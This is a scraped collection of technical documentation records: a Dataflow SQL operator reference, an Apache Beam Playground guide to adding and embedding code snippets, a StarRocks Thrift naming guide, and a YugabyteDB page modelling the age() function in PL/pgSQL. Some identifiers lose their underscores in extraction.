list.</td> <td>Less than or equal to</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>&gt;=</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Greater than or equal to</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>!=, &lt;&gt;</td> <td>Any comparable type. See <a href=\"/documentation/dsls/sql/zetasql/data-types\">Data Types</a> for a complete list.</td> <td>Not equal</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[NOT] LIKE</td> <td>STRING and byte</td> <td>Value does [not] match the pattern specified</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[NOT] BETWEEN</td> <td>Any comparable types. 
See Data Types for list.</td> <td>Value is [not] within the range specified</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>[NOT] IN</td> <td>Any comparable types. See Data Types for list.</td> <td>Value is [not] in the set of values specified</td> <td>Binary</td> </tr> <tr> <td>&nbsp;</td> <td>IS [NOT] <code>NULL</code></td> <td>All</td> <td>Value is [not] <code>NULL</code></td> <td>Unary</td> </tr> <tr> <td>&nbsp;</td> <td>IS [NOT] TRUE</td> <td>BOOL</td> <td>Value is [not] TRUE.</td> <td>Unary</td> </tr> <tr> <td>&nbsp;</td> <td>IS [NOT] FALSE</td> <td>BOOL</td> <td>Value is [not] FALSE.</td> <td>Unary</td> </tr> <tr> <td>6</td> <td>NOT</td> <td>BOOL</td> <td>Logical NOT</td> <td>Unary</td> </tr> <tr> <td>7</td> <td>AND</td> <td>BOOL</td> <td>Logical AND</td> <td>Binary</td> </tr> <tr> <td>8</td> <td>OR</td> <td>BOOL</td> <td>Logical OR</td> <td>Binary</td> </tr> </tbody> </table> {{< /table >}} </div> Operators with the same precedence are left associative. This means that those operators are grouped together starting from the left and moving" }, { "data": "For example, the expression: `x AND y AND z` is interpreted as `( ( x AND y ) AND z )` The expression: ``` x * y / z ``` is interpreted as: ``` ( ( x * y ) / z ) ``` All comparison operators have the same priority and are grouped using left associativity. However, comparison operators are not associative. As a result, it is recommended that you use parentheses to improve readability and ensure expressions are resolved as desired. For example: `(x < y) IS FALSE` is recommended over: `x < y IS FALSE` <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Operator</th> <th>Syntax</th> <th>Input Data Types</th> <th>Result Data Type</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>.</td> <td>expression.fieldname1...</td> <td><span> STRUCT</span><br></td> <td>Type T stored in fieldname1</td> <td>Dot operator. 
Can be used to access nested fields, e.g.expression.fieldname1.fieldname2...</td> </tr> <tr> <td>[ ]</td> <td>arrayexpression [positionkeyword (int_expression ) ]</td> <td>See ARRAY Functions.</td> <td>Type T stored in ARRAY</td> <td>position_keyword is either OFFSET or ORDINAL.</td> </tr> </tbody> </table> {{< /table >}} </div> All arithmetic operators accept input of numeric type T, and the result type has type T unless otherwise indicated in the description below: {{< table >}} <table> <thead> <tr> <th>Name</th> <th>Syntax</th> </tr> </thead> <tbody> <tr> <td>Addition</td> <td>X + Y</td> </tr> <tr> <td>Subtraction</td> <td>X - Y</td> </tr> <tr> <td>Multiplication</td> <td>X * Y</td> </tr> <tr> <td>Division</td> <td>X / Y</td> </tr> <tr> <td>Unary Minus</td> <td>- X</td> </tr> </tbody> </table> {{< /table >}} Result types for Addition and Multiplication: {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr><th>&nbsp;</th><th>INT64</th><th>FLOAT64</th></tr> </thead> <tbody><tr><td>INT64</td><td>INT64</td><td>FLOAT64</td></tr><tr><td>FLOAT64</td><td>FLOAT64</td><td>FLOAT64</td></tr></tbody> </table> {{< /table >}} Result types for Subtraction: {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr><th>&nbsp;</th><th>INT64</th><th>FLOAT64</th></tr> </thead> <tbody><tr><td>INT64</td><td>INT64</td><td>FLOAT64</td></tr><tr><td>FLOAT64</td><td>FLOAT64</td><td>FLOAT64</td></tr></tbody> </table> {{< /table >}} Result types for Division: {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr><th>&nbsp;</th><th>INT64</th><th>FLOAT64</th></tr> </thead> <tbody><tr><td>INT64</td><td>FLOAT64</td><td>FLOAT64</td></tr><tr><td>FLOAT64</td><td>FLOAT64</td><td>FLOAT64</td></tr></tbody> </table> {{< /table >}} Result types for Unary Minus: {{< table >}} <table> <thead> <tr> <th>Input Data Type</th> <th>Result Data Type</th> </tr> </thead> <tbody> <tr> <td>INT64</td> <td>INT64</td> </tr> <tr> <td>FLOAT64</td> <td>FLOAT64</td> </tr> </tbody> </table> {{< /table >}} All logical operators allow only BOOL input. <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Name</th> <th>Syntax</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Logical NOT</td> <td nowrap>NOT X</td> <td>Returns FALSE if input is TRUE. Returns TRUE if input is FALSE. Returns <code>NULL</code> otherwise.</td> </tr> <tr> <td>Logical AND</td> <td nowrap>X AND Y</td> <td>Returns FALSE if at least one input is FALSE. Returns TRUE if both X and Y are TRUE. Returns <code>NULL</code> otherwise.</td> </tr> <tr> <td>Logical OR</td> <td nowrap>X OR Y</td> <td>Returns FALSE if both X and Y are FALSE. Returns TRUE if at least one input is TRUE. Returns <code>NULL</code> otherwise.</td> </tr> </tbody> </table> {{< /table >}} </div> Comparisons always return BOOL. Comparisons generally require both operands to be of the same type. If operands are of different types, and if Cloud Dataflow SQL can convert the values of those types to a common type without loss of precision, Cloud Dataflow SQL will generally coerce them to that common type for the comparison; Cloud Dataflow SQL will generally , where present. Comparable data types are defined in . STRUCTs support only 4 comparison operators: equal (=), not equal (!= and <>), and IN. The following rules apply when comparing these data types: FLOAT64 : All comparisons with NaN return FALSE, except for `!=` and `<>`, which return TRUE. BOOL: FALSE is less than TRUE. 
STRING: Strings are compared codepoint-by-codepoint, which means that canonically equivalent strings are only guaranteed to compare as equal if they have been normalized" }, { "data": "`NULL`: The convention holds here: any operation with a `NULL` input returns `NULL`. <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Name</th> <th>Syntax</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Less Than</td> <td>X &lt; Y</td> <td>Returns TRUE if X is less than Y.</td> </tr> <tr> <td>Less Than or Equal To</td> <td>X &lt;= Y</td> <td>Returns TRUE if X is less than or equal to Y.</td> </tr> <tr> <td>Greater Than</td> <td>X &gt; Y</td> <td>Returns TRUE if X is greater than Y.</td> </tr> <tr> <td>Greater Than or Equal To</td> <td>X &gt;= Y</td> <td>Returns TRUE if X is greater than or equal to Y.</td> </tr> <tr> <td>Equal</td> <td>X = Y</td> <td>Returns TRUE if X is equal to Y.</td> </tr> <tr> <td>Not Equal</td> <td>X != Y<br>X &lt;&gt; Y</td> <td>Returns TRUE if X is not equal to Y.</td> </tr> <tr> <td>BETWEEN</td> <td>X [NOT] BETWEEN Y AND Z</td> <td>Returns TRUE if X is [not] within the range specified. The result of \"X BETWEEN Y AND Z\" is equivalent to \"Y &lt;= X AND X &lt;= Z\" but X is evaluated only once in the former.</td> </tr> <tr> <td>LIKE</td> <td>X [NOT] LIKE Y</td> <td>Checks if the STRING in the first operand X matches a pattern specified by the second operand Y. Expressions can contain these characters: <ul> <li>A percent sign \"%\" matches any number of characters or bytes</li> <li>An underscore \"_\" matches a single character or byte</li> <li>You can escape \"\\\", \"_\", or \"%\" using two backslashes. For example, <code> \"\\\\%\"</code>. If you are using raw strings, only a single backslash is required. For example, <code>r\"\\%\"</code>.</li> </ul> </td> </tr> <tr> <td>IN</td> <td>Multiple - see below</td> <td>Returns FALSE if the right operand is empty. Returns <code>NULL</code> if the left operand is <code>NULL</code>. Returns TRUE or <code>NULL</code>, never FALSE, if the right operand contains <code>NULL</code>. Arguments on either side of IN are general expressions. Neither operand is required to be a literal, although using a literal on the right is most common. X is evaluated only once.</td> </tr> </tbody> </table> {{< /table >}} </div> When testing values that have a STRUCT data type for equality, it's possible that one or more fields are `NULL`. In such cases: If all non-NULL field values are equal, the comparison returns NULL. If any non-NULL field values are not equal, the comparison returns false. The following table demonstrates how STRUCT data types are compared when they have fields that are `NULL` valued. {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Struct1</th> <th>Struct2</th> <th>Struct1 = Struct2</th> </tr> </thead> <tbody> <tr> <td><code>STRUCT(1, NULL)</code></td> <td><code>STRUCT(1, NULL)</code></td> <td><code>NULL</code></td> </tr> <tr> <td><code>STRUCT(1, NULL)</code></td> <td><code>STRUCT(2, NULL)</code></td> <td><code>FALSE</code></td> </tr> <tr> <td><code>STRUCT(1,2)</code></td> <td><code>STRUCT(1, NULL)</code></td> <td><code>NULL</code></td> </tr> </tbody> </table> {{< /table >}} IS operators return TRUE or FALSE for the condition they are testing. They never return `NULL`, even for `NULL` inputs. If NOT is present, the output BOOL value is inverted. 
<div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Function Syntax</th> <th>Input Data Type</th> <th>Result Data Type</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><pre>X IS [NOT] NULL</pre></td> <td>Any value type</td> <td>BOOL</td> <td>Returns TRUE if the operand X evaluates to <code>NULL</code>, and returns FALSE otherwise.</td> </tr> <tr> <td><pre>X IS [NOT] TRUE</pre></td> <td>BOOL</td> <td>BOOL</td> <td>Returns TRUE if the BOOL operand evaluates to TRUE. Returns FALSE otherwise.</td> </tr> <tr> <td><pre>X IS [NOT] FALSE</pre></td> <td>BOOL</td> <td>BOOL</td> <td>Returns TRUE if the BOOL operand evaluates to FALSE. Returns FALSE otherwise.</td> </tr> </tbody> </table> {{< /table >}} </div>" } ]
{ "category": "App Definition and Development", "file_name": "load_your_code.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Adding a new example, code snippet, or Tour of Beam learning unit into the Playground is a three-step process: Prepare a code snippet. Add the code snippet to Apache Beam and/or Playground. Create a link to view the code snippet in Playground or to embed in a website page. Playground sources and output presentation formats: This guide will walk through all steps. * * * + + * * * + + + * + * * * Playground runs example code snippets using Apache Beam Direct Runner and requires that a code snippet is a complete runnable code. Code snippets can use data sources to demonstrate transforms and concepts. Playground restricts code access to Internet for security reasons. Following are the recommend ways for code snippet's data sources and dependecies: | Source/Dependency | Notes | |-|--| | File | Store code snippet's data file in a GCS bucket in `apache-beam-testing` project. | | BigQuery | Create a BigQuery dataset/table in `apache-beam-testing` project. | | Python package | Python packages accessible by Playground are located in a and in . Add required packages to . Please submit pull request with changes to the container or contact | | GitHub repo | If your example clones or dependes on files in a GitHub repo, copy required files to a GCS bucket in `apache-beam-testing` project and use the GCS files. | Playground provides multiple features to help focus users on certain parts of the code. Playground automatically applies the following to all snippets: Folds a comment if a snippet starts with one. Folds imports. Playground supports Named Sections to tag code blocks and provide the following view options: Fold all blocks except tagged code blocks. This can be useful to help user focus on specific code blocks and features presented in a snippet. Hide all code except tagged code blocks. This can be useful to create runnable snippets illustrating specific concepts or transforms, and hide all non-essential code blocks. Such snippet can be embedded on a website to make examples in documentation and tutorials runnable. Make certain code parts read-only. This feature can be useful to create learning units where user modifications are desired only in certain parts of the" }, { "data": "Please see section for details how different view options can be used. If you do not need any of those view options, skip to the . Named Sections are defined with the following syntax: ``` // [START section_name] void method() { ... } // [END section_name] ``` Create a named section for each part of your code that you want the above features for. To learn more details about the syntax please see the that Playground uses. There are several types of code snippets in the Playground: Example a code snippet displayed in the Playground Examples Catalog. See . 
Unlisted Example the same as an example, but is not listed in the example dropdown and can only be accessed by direct linking. These are typically embedded on a website. See . learning unit. See . User-shared code snippets do not require a PR and should be used for code not displayed on Beam resources. See . GitHub or other HTTPS URL sources. See . See the how artifacts map to these sources. Playground Examples Catalog helps users discover example snippets and is the recommended way to add examples. Playground automatically scans, verifies and deploys example snippets from the directories listed below. Note: SCIO examples are stored in a separate repository. To add support for a new SCIO example, please refer to . Playground Java, Python, and Go examples are automatically picked from these predefined directories by the `playgroundexamplesci.yml` GitHub workflow after a PR is merged to Beam repo: `/examples` `/learning/katas` `/sdks`. Adding Scala example snippets automatically is not supported, and Scala example snippets can be added to the catalog manually. Playground relies on metadata comments block to identify and place an example into the database, which is required for an example to show in the Examples Catalog. See for an example. Playground automatically removes metadata comments block before storing the example in database, so the metadata is not visible to end users. The block is in the format of a YAML map: ```yaml beam-playground: name: \"\" description: \"\" pipeline_options: \"--name1 value1 --name2 value2\" context_line: 1 categories: \"Combiners\" \"Core Transforms\" tags: \"numbers\" \"count\" complexity: BASIC default_example: true url_notebook: \"https://colab.research.google.com/github/apache/beam/blob/master/examples/notebooks/documentation/transforms/python/elementwise/filter-py.ipynb\" multifile: true always_run: true datasets: CountWords: location: local format: avro emulators: type: kafka topic: id: dataset source_dataset: \"CountWords\" ``` For metadata reference, see the fields in the `Tag` class . The list of supported categories for an example is . To add a new category, submit a PR that adds a category to the . When it is merged, the new category can be used in an example. Each SDK must have a single default example. If there is none, the user will see an error in the app and a blank editor. If there are more than one, it is not defined which one will be selected. Examples which require Kafka server emulator need to include the `emulators` tag and provide `dataset` in the example's tag. You can refer to an example" }, { "data": "Add your dataset in either JSON or Avro format into the `playground/backend/datasets` path. Add the following elements to the example's metadata tag: ```YAML emulators: type: kafka topic: id: dataset sourcedataset: <datasetname> datasets: <dataset_name>: location: local format: json # or 'avro' ``` replace `<dataset_name>` with the name of your dataset file without the file name extension. Use the exact string `\"kafka_server:9092\"` as the server name in your code snippet. This string will be replaced by the actual host name and port automatically before the compilation step by Playground. Kafka emulator limitations: Playground Kafka emulator currently supports only Beam Java SDK. The exact string `\"kafka_server:9092\"` should be present in the code snippet; any other variation like `\"kafa_server\" + \":9092\"` will not work. Create and submit a PR with the code snippet into following the . 
Verify that all pre-commit tests are passing. Playground CI will verify and deploy the example to Playground Example Catalog when the PR is merged. The snippet will be assigned an ID. You can find it in the address bar of the browser when you select it in the dropdown. For example, in this URL: ``` https://play.beam.apache.org/?path=SDKJAVAMinimalWordCount&sdk=java ``` the ID is: `SDKJAVAMinimalWordCount`. You will need the snippet ID to embed the Playground with the snippet into a website page. Not all examples must be visible in the example dropdown. Some examples are best in the context of Apache Beam documentation. To embed them into the documentation, use unlisted examples. They work and are checked and cached the same way as the examples displayed in the Playground catalog. Proceed the same way as with except: Use the directory `/learning/beamdoc` Do not use the following attributes: `categories` `default_example` `tags` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | SDKGOname | | Java | SDKJAVAname | | Python | SDKPYTHONname | \"Tour of Beam\" is a separate project that combines learning materials with runnable snippets and allows students to track their learning progress. It uses the Playground engine, and so its content is added in a similar way. A Tour of Beam unit consists of learning materials and an optional runnable snippet. See on how to add units and link snippets to them. Tour of Beam snippets are checked and cached the same way as Playground examples. Proceed the same way as with except: Use the directory `/learning/tour-of-beam/learning-content`. It is recommended to follow the directory hierarchy as described in . Do not use the following attributes: `categories` `default_example` `tags` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | TBEXAMPLESSDKGOname | | Java | TBEXAMPLESSDKJAVAname | | Python | TBEXAMPLESSDKPYTHONname | For instance, for the Go the example `CSV` it is `TBEXAMPLESSDKGOCSV`. A code snippet can be saved to the Playground using \"Share my code\" button in the Playground: This is easy and" }, { "data": "It does not require any interaction with the Beam team. Share my code considerations: A user-shared snippet is immutable. If you edit the code and re-share, a new snippet and a new link will be generated. Playground automatically applies a 3-month retention policy to shared snippets that are not used. To request a deletion of a snippet, please send an email to with subject: [Playground] Delete a snippet. Playground does not cache output or graph for user-shared snippets. Playground does not verify user-shared snippets. Playground can load a snippet stored on an HTTPS server using the provided URL, including GitHub direct links to raw file content. This is as easy and fast as using Share my code button, but also allows you to modify a snippet after it is published without changing a link. Loading snippet from HTTPS URL considerations: Playground does not cache output or graph for HTTPS URL snippets. Playground does not verify HTTPS URL snippets. For Playground to be able to load the snippet over HTTPS, the HTTPS server needs to allow the access by sending the following header: ``` Access-Control-Allow-Origin: * ``` at least when requested with `*.beam.apache.org` as . This is related to Cross-Origin Resource Sharing (CORS), to read more about CORS please see . 
Many prefer to host code snippets in their GitHub repositories. GitHub is known to allow cross-origin access on direct links to raw file content. An example of loading a GitHub snippet: ``` https://play.beam.apache.org/?sdk=go&url=https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go ``` The snippet can now be shown in the Playground. Choose any of the following ways. Open your snippet in the dropdown menu. Without changing it, click \"Share my code\". Copy the link. The link contains the `path` to your snippet in the database. It is in the following format: ``` https://play.beam.apache.org/?path=SDKJAVAMinimalWordCount&sdk=java ``` A special case is the default snippet for an SDK. It can be loaded by the following link: ``` https://play.beam.apache.org/?sdk=python&default=true ``` This way if another snippet is ever made default, the links you shared will lead to the new snippet. Link to an unlisted example can be constructed by providing your snippet ID and SDK in the following URL: ``` https://play.beam.apache.org/?path=<ID>&sdk=<SDK> ``` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | SDKGOname | | Java | SDKJAVAname | | Python | SDKPYTHONname | Link to a snippet can be constructed by providing your snippet ID and SDK in the following URL: ``` https://play.beam.apache.org/?path=<ID>&sdk=<SDK> ``` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | TBEXAMPLESSDKGOname | | Java | TBEXAMPLESSDKJAVAname | | Python | TBEXAMPLESSDKPYTHONname | For instance, for the Go the example `CSV` it is `TBEXAMPLESSDKGOCSV`, and the link is ``` https://play.beam.apache.org/?path=TBEXAMPLESSDKGOCSV&sdk=go ``` You get the link when you click \"Share my code\" button. It is in the following format: ```" }, { "data": "``` Add the URL to the `url` parameter, for example: ``` https://play.beam.apache.org/?sdk=go&url=https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go ``` You can link to an empty editor to make your users start their snippets from scratch: ``` https://play.beam.apache.org/?sdk=go&empty=true ``` The above URLs load snippets that you want. But what happens if the user switches SDK? Normally this will be shown: The catalog default example for the new SDK. The empty editor for the new SDK if the Playground is embedded. This can be changed by linking to multiple examples, up to one per SDK. For this purpose, make a JSON array with any combination of parameters that are allowed for loading single examples, for instance: ```json [ { \"sdk\": \"java\", \"path\": \"SDKJAVAAggregationMax\" }, { \"sdk\": \"go\", \"url\": \"https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go\" } ] ``` Then pass it in`examples` query parameter like this: `https://play.beam.apache.org/?sdk=go&examples=[{\"sdk\":\"java\",\"path\":\"SDKJAVAAggregationMax\"},{\"sdk\":\"go\",\"url\":\"https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go\"}]` This starts with the Go example loaded from the URL. If SDK is then switched to Java, the `AggregationMax` catalog example is loaded for it. If SDK is switched to any other one, the default example for that SDK is loaded, because no override was provided. Embedded Playground is a simplified interface of the Playground web app designed to be embedded into an `<iframe>` in web pages. It supports most of the Playground web app features. 
The embedded Playground URLs start with `https://play.beam.apache.org/embedded` and use the same query string parameters as the Playground web app. Additionally, the Embedded playground supports `editable=0` parameter to make the editor read-only. Open your snippet in the dropdown menu. Without changing it, click \"Share my code\". Go to \"Embed\" tab. Copy the HTML code and add to your web page. Open your code by the link that you got when you shared it. Again click \"Share my code\". Go to \"Embed\" tab. Copy the HTML code and add to your web page. Follow the instructions to to your code. Optionally make the link to the Embedded Playground by replacing `play.beam.apache.org/?...` with `play.beam.apache.org/embedded?...` because the embedded interface is simpler. Insert this link into an `<iframe>` HTML element as follows: ```html <iframe src=\"https://play.beam.apache.org/embedded?sdk=go&url=https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go\" width=\"90%\" height=\"600px\" allow=\"clipboard-write\" /> ``` Apache Beam website uses . Custom Hugo shortcodes were added to Apache Beam website to embed Playground snippets. Use the custom shortcodes to embed Playground into the Apache Beam website: `playground` shortcode, see for a complete example. `playground_snippet` shortcode, see for all supported options. These shortcodes generate an `iframe` with the URLs described above. If your code contains named sections as described in the , you can apply view options to those sections. Otherwise skip this. Add `readonly` parameter with comma-separated section names: `https://play.beam.apache.org/?sdk=go&url=...&readonly=section_name` Add `unfold` parameter with comma-separated section names: `https://play.beam.apache.org/?sdk=go&url=...&unfold=section_name` This folds all foldable blocks that do not overlap with any of the given sections. Add `show` parameter with a single section name: `https://play.beam.apache.org/?sdk=go&url=...&show=section_name` It is still the whole snippet that is sent for execution, although only the given section is visible. This also makes the editor read-only so the user cannot add code that conflicts with the hidden text." } ]
{ "category": "App Definition and Development", "file_name": "thrift-guides.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" As the project involving, any fields may become optional. But if it is defined as required, it can not be removed. So `required` should not be used. To be back compatible, the ordinal of the field SHOULD NOT be changed. The names of messages are all lowercase, with underscores between words. Files should end in `.thrift`. ``` my_struct.thrift // Good MyStruct.thrift // Bad my_struct.proto // Bad ``` Struct names start with a capital letter `T` and have a capital letter for each new word, with no underscores: TMyStruct ``` struct TMyStruct; // Good struct MyStruct; // Bad struct TMy_Struct; // Bad struct TmyStruct; // Bad ``` The names of struct members are all lowercase, with underscores between words. ``` 1: optional i64 my_field; // Good 1: optional i64 myField; // Bad ```" } ]
{ "category": "App Definition and Development", "file_name": "age.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: Function age() returns integer [YSQL] headerTitle: Function age() returns integer linkTitle: Function age() description: The semantics of \"function age() returns integer\". [YSQL] menu: v2.18: identifier: age parent: miscellaneous weight: 10 type: docs This section defines the semantics of the overload of the function age() with two parameters of data type plain timestamp by implementing the defining rules in PL/pgSQL in the function modeledage(). The rules by which the returned interval value is calculated are the same for the (timestamptz, timestamptz) overload as for the plain (timestamp, timestamp) overload except that, for the with time zone_ overload, the actual timezone component (whether this is specified implicitly or taken from the session environment) and the sensitivity to the reigning timezone have their usual effect. It turns out that to match the behaviour of the built-in age(timestamp, timestamp) function, modeledage(timestamp, timestamp) needs to map a \"borrowed\" month into a month-specific number of days. (The subsection on this page's parent page introduces the notion of \"borrowing\".) The function daysprmonth() implements the mapping. Because of the effect of leap years, the function needs both year and month_ parameters. Create the helper function thus: ```plpgsql drop function if exists daysprmonth(int, int) cascade; create function daysprmonth(year in int, month in int) returns int language plpgsql as $body$ begin -- Self-doc. The value of \"month\" comes from \"extract(month from ...)\". assert (month between 1 and 12), 'daysprmonth: assert failed'; declare m_next constant int not null := case month when 12 then 1 else month + 1 end; ynext constant int not null := case mnext when 1 then year + 1 else year end; begin -- February needs special treatment 'cos of leap year possibility. -- So may as well use the same method for all months. return makedate(ynext, mnext, 1) - makedate(year, month, 1); end; end; $body$; ``` You can test it with examples like this: ```plpgsql select daysprmonth(2011, 2) as \"Feb-2011\", daysprmonth(2012, 2) as \"Feb-2012\", daysprmonth(2013, 4) as \"Apr-2013\", daysprmonth(2016, 12) as \"Dec-2016\"; ``` This is the result: ```output Feb-2011 | Feb-2012 | Apr-2013 | Dec-2016 -+-+-+- 28 | 29 | 30 | 31 ``` Because the says nothing of value to describe the semantics that the function age(timestamp, timestamp) implements, the function modeledage(timestamp, timestamp)_ was developed to a large extent by trial and errorin other words, thorough testing with a huge set of input values was key. (See the subsections that describe the functions and below.) The implementation was made simpler by this intuitive, and trivially observable, realization: ```output age(t1, t2) == -age (t2, t1) ``` The following intuition (copied from this page's parent page) is key to the scheme: The function age() extracts the year, month, day, and seconds since midnight for each of the two input moment values. It then subtracts these values pairwise and uses them to create an interval value. But the statement of the semantics must be made more carefully than this to accommodate the fact that the outcomes of the pairwise differences might be negative. So the first step, done conveniently in the declare section, is to calculate the pairwise differences months, days, and secs navelyaccepting that the values might come out negative. 
However, because the input timestamp values are exchanged, if necessary, so that the local variable tdob (for date-of-birth) is less than or equal to the local variable ttoday., it's guaranteed that the navely computed value of the years pairwise difference cannot be negative. There is, though, a different quirk to accommodate in the years calculation: the year zero (as a matter of arbitrary, but universal, convention) simply does not" }, { "data": "This means that the years difference between 1 AD and 1 BC is just one. This explains the use of the case expression in the expression for years. The executable block statement (from begin through its matching end;) revisits the computation of each of secs, days, and months, in that order, by implementing \"borrowing\" from the immediately next coarser-grained difference value when the initially computed present value is negative. This is where the conversion from one \"borrowed\" month to a number of days must accommodate the number of days in the \"borrowed\" monthgiven not only which month it is but also, because of the possibility that this is February in a leap year, which year it is. This pinpoints a key question: Which is the \"borrowed\" month? Is it (a) the one with [yydob, mmdob]; or (b) the one with [yytoday, mmtoday]; or (c) maybe the month that precedes or follows either of these? Empirical testing shows that the \"borrowed\" month is given by choice (a). The candidate interval value to return is then evaluated (using the revised values) as: ```output make_interval(years=>years, months=>months, days=>days, secs=>secs); ``` The final step is simply to take account of whether the initial test showed that the input timestamp values should be exchanged. If there was no exchange, then the candidate interval value is returned \"as is\". But if the input timestamp values were exchanged, then the negated candidate interval value is returned. Create the function thus: ```plpgsql drop function if exists modeled_age(timestamp, timestamp) cascade; create function modeledage(ttodayin in timestamp, tdob_in in timestamp) returns interval language plpgsql as $body$ declare -- Exchange the inputs for negative age. negativeage constant boolean not null := (ttodayin - tdobin) < makeinterval(); ttoday constant timestamp not null := case negativeage when true then tdobin else ttodayin end; tdob constant timestamp not null := case negativeage when true then ttodayin else tdobin end; secsprday constant double precision not null := 246060; monspryear constant int not null := 12; yytoday constant int not null := extract(year from ttoday); mmtoday constant int not null := extract(month from ttoday); ddtoday constant int not null := extract(day from ttoday); sstoday constant double precision not null := extract(epoch from ttoday::time); yydob constant int not null := extract(year from tdob); mmdob constant int not null := extract(month from tdob); dddob constant int not null := extract(day from tdob); ssdob constant double precision not null := extract(epoch from tdob::time); years int not null := case -- Special treatment is needed when yytoday and yydob span AC/BC -- 'cos there's no year zero. 
when yytoday > 0 and yydob < 0 then yytoday - yydob - 1 else yytoday - yydob end; months int not null := mmtoday - mmdob; days int not null := ddtoday - dddob; secs double precision not null := sstoday - ssdob; begin if secs < 0 then secs := secs + secsprday; days := days - 1; end if; if days < 0 then days := days + daysprmonth(yydob, mmdob); months := months - 1; end if; if months < 0 then months := months + 12; years := years - 1; end if; declare age constant interval not null := make_interval(years=>years, months=>months, days=>days, secs=>secs); begin return case negative_age when true then -age else age end; end; end; $body$; ``` The design of this is straightforward. It evaluates both age() and modeledage() using the actual input timestamp values. Then it compares them for" }, { "data": "Notice that it's critical to use the user-defined \"strict equals\" operator, `==`, for a pair of interval_ values rather than the native equals for this argument pair. The section presents the code that creates the \"strict equals\" operator. The recommendation, given at the start of the section, is to download the '.zip' file to create the reusable code that supports the pedagogy of the overall date-time major section and then to execute the kit's \"one-click\" install script. The section explains why you must use the \"strict equals\" operator. The function returns a text value that starts with the text typecasts of the actual input timestamp values followed by the text typecast of the result given by the built-in age() function. Only if the function modeledagevsage() gives a result that is not strictly equal to the built-in age() function's result, is the modeled result appended to the returned text value. The idea here is to reduce the visual noise in the output to make it easy to spot when (at least while modeledage() was under development) the results from the built-in and the modeled functions disagree. Create the comparison function thus: ```plpgsql drop function if exists modeledagevs_age(timestamp, timestamp) cascade; create function modeledagevsage(ttoday in timestamp, t_dob in timestamp) returns text language plpgsql as $body$ declare input constant text not null := lpad(ttoday::text, 31)||' '||lpad(tdob::text, 31)||' '; m constant interval not null := modeledage(ttoday, t_dob); a constant interval not null := age(ttoday, tdob); begin return case (m == a) when true then input||lpad(a::text, 42) else input||lpad(a::text, 42)||' ! '||lpad(m::text, 42) end; end; $body$; ``` Now exercise the comparison function with a few manually composed input values. The results are easiest to read if you use a table function encapsulation: ```plpgsql drop function if exists manualtestreportformodeled_age() cascade; create function manualtestreportformodeled_age() returns table(z text) language plpgsql as $body$ begin z := lpad('ttoday', 31 )||' '||lpad('tdob', 31 )||' '||lpad('age()', 42 ); return next; z := lpad('-', 31, '-')||' '||lpad('-', 31, '-')||' '||lpad('-', 42, '-'); return next; -- Sanity test: zero age. z := modeledagevs_age('2019-12-21', '2019-12-21' ); return next; -- Positive ages. z := modeledagevs_age('2001-04-10', '1957-06-13' ); return next; z := modeledagevs_age('2001-04-10 11:19:17', '1957-06-13 15:31:42' ); return next; z := modeledagevs_age('0007-06-13 15:31:42.123456 BC', '2001-04-10 11:19:17.654321 BC'); return next; -- Negative age. z := modeledagevs_age('1957-06-13 15:31:42', '2001-04-10 11:19:17' ); return next; -- ttoday and tdob span the BC/AD transition. 
